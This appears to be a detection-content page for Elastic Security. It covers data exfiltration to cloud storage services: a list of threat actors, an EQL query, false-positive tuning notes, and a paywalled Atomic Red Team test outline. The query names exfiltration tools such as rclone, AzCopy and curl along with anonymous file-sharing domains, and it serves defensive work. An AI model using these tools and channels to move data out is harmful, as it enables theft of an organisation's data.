Detect Data Exfiltration via Cloud Storage Services in Elastic Security
Exfiltration of corporate data to attacker-controlled cloud storage is a dominant technique in double-extortion ransomware campaigns and espionage operations. Adversaries use legitimate cloud storage services (Mega, Dropbox, OneDrive, Box, Google Drive, rclone, AzCopy, ShareFile) to blend exfiltration traffic with normal business activity, bypassing egress monitoring that blocks unknown C2 IPs. Scattered Spider used Mega for SMB data exfiltration before ransomware deployment in 2024-2025. Akira and Black Basta affiliates use rclone with SFTP/cloud backends. Lazarus Group favors Dropbox and Google Drive. Key indicators: rclone.exe or azcopy.exe execution with external cloud endpoints, large outbound data transfers to cloud storage IPs, WinSCP or FileZilla used for bulk data staging, and PowerShell Invoke-WebRequest with cloud storage URLs. Detection opportunity exists in the staging phase (file collection before transfer) and the transfer phase (network and process telemetry).
MITRE ATT&CK
- Tactic
- Exfiltration
Elastic Detection Query
process where event.type == "start" and
(
process.name : "rclone.exe"
or (
process.name : "azcopy.exe" and
process.command_line : ("*blob.core.windows.net*", "*file.core.windows.net*", "*queue.core.windows.net*")
)
or (
process.name : ("curl.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe") and
process.command_line : (
"*mega.nz*", "*mega.io*", "*dropbox.com*", "*dropboxapi.com*",
"*transfer.sh*", "*gofile.io*", "*box.com*", "*box.net*",
"*drive.google.com*", "*onedrive.live.com*", "*sharefile.com*",
"*sendspace.com*", "*filebin.net*", "*anonfiles.com*"
)
)
)Detects data exfiltration via cloud storage tools using Elastic ECS process events. Alerts on rclone.exe execution (primary ransomware exfil tool used by Scattered Spider, Akira, Black Basta), AzCopy targeting external Azure Blob/File storage endpoints, and PowerShell or curl invocations referencing known cloud storage and anonymous file-sharing domains. Maps to MITRE T1567.002.
Data Sources
Required Tables
False Positives & Tuning
- Authorized IT data migrations: infrastructure teams running rclone for approved cloud storage migrations between providers — verify with change management tickets, whitelist specific service account process.user.name values, and correlate against known maintenance windows
- Azure DevOps or CI/CD pipelines: AzCopy invoked by pipeline agents deploying static assets to Azure Blob Storage — add corporate Azure storage account FQDNs to the exclusion list in process.command_line and filter on known build agent hostnames via host.name
- Sanctioned SaaS file sharing: end users on corporate-approved Dropbox Business or Box Enterprise accounts syncing files in bulk — tune alerts to flag only personal or unregistered accounts and supplement with volume thresholds from network events
Other platforms for THREAT-CloudStorage-DataExfil
Testing Methodology
Validate this detection against 1 adversary technique from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Simulate Cloud Exfiltration via rclone to Mega
Expected signal: Sysmon Event ID 1: rclone.exe with copy command targeting mega remote. Sysmon Event ID 3: network connection to mega.co.nz or api.mega.co.nz.
Unlock Pro Content
Get the full detection package for THREAT-CloudStorage-DataExfil including response playbook, investigation guide, and atomic red team tests.